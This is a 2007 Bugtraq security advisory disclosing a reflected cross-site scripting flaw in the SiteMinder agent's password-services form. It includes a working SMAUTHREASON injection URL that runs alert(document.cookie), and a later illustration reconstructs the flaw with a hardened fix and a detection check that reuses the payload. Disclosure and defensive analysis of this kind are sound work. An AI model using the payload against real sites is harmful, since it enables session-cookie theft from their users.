SiteMinder Agent: Cross Site Scripting
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: SiteMinder Agent: Cross Site Scripting
- From: "Giuseppe Gottardi" <overet@xxxxxxxxxxxxxxx>
- Date: Wed, 7 Nov 2007 04:10:00 +0100
# Exploit in [XSS]:
https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=[XSS]
# Cross Site Scripting (Code):
https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=1)alert(document.cookie);}function+drop(){if(0
In this way we can inject the alert() code without brackets in the
function resetCredFields().
-------------------------------
function resetCredFields()
{
if (1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 0 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 4 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 5 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 28 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 30 )
{
document.PWChange.PASSWORD.value = '';
}
else if (1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 1 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 18 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 20 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 22 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 31 || 1)
{
alert(document.cookie);
}
}
function drop(){
if( 0 == 34)
{
document.PWChange.NEWPASSWORD.value = '';
document.PWChange.CONFIRMATION.value = '';
}
}
...
<BODY bgcolor='#ffffff' text='#000000' onLoad = 'resetCredFields();'>
-------------------------------
Regards,
Giuseppe Gottardi (aka oveRet)
---
Giuseppe Gottardi
Senior Security Engineer at Communication Valley S.p.A.
E-mail: overet@xxxxxxxxxxxxxxx
Web: http://overet.securitydate.it
Wednesday November 07, 2007.
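As an added illustration of the issue described in the post (not code from the advisory, from CA, or from the SiteMinder agent itself): a minimal reconstruction of an .fcc template that splices the SMAUTHREASON query parameter into inline script, beside a hardened rendering and a log-review check. The template shape, the `renderResetScript*` and `normalizeAuthReason` helpers, and the digit-only pattern are assumptions inferred from the output quoted above.

```javascript
// Added example, not from the advisory or the SiteMinder product.
// The template shape is an assumption inferred from the rendered page
// quoted in the post; smpwservices.fcc itself is not reproduced.

// Vulnerable rendering: the raw parameter value is concatenated straight
// into JavaScript source, so a value that closes the "if(" expression
// turns the rest of the parameter into executable script.
function renderResetScriptUnsafe(authReason) {
  return (
    "function resetCredFields()\n{\nif (" + authReason + ")\n{\n" +
    "document.PWChange.PASSWORD.value = '';\n}\n}\n"
  );
}

// SMAUTHREASON is a numeric reason code, so a short run of digits is the
// only shape a legitimate value takes (assumed bound of three digits).
const AUTH_REASON_PATTERN = /^[0-9]{1,3}$/;

// Hardened rendering: validate the parameter as an integer first and
// emit it as a JSON literal; anything else falls back to a neutral 0.
function normalizeAuthReason(raw) {
  if (typeof raw !== "string" || !AUTH_REASON_PATTERN.test(raw)) {
    return 0;
  }
  return Number(raw);
}

function renderResetScriptSafe(rawAuthReason) {
  const reason = normalizeAuthReason(rawAuthReason);
  return (
    "function resetCredFields()\n{\nif (" + JSON.stringify(reason) + ")\n{\n" +
    "document.PWChange.PASSWORD.value = '';\n}\n}\n"
  );
}

// Log-review / WAF-style check (constructed heuristic): any SMAUTHREASON
// that is not purely numeric is worth flagging for this endpoint.
function isSuspiciousAuthReason(raw) {
  return !AUTH_REASON_PATTERN.test(String(raw));
}

// Constructed sample values: a legitimate reason code and the injection
// string quoted in the advisory.
const LEGIT_REASON = "34";
const INJECTED_REASON = "1)alert(document.cookie);}function drop(){if(0";

console.log(renderResetScriptSafe(LEGIT_REASON));
console.log(isSuspiciousAuthReason(INJECTED_REASON)); // true
```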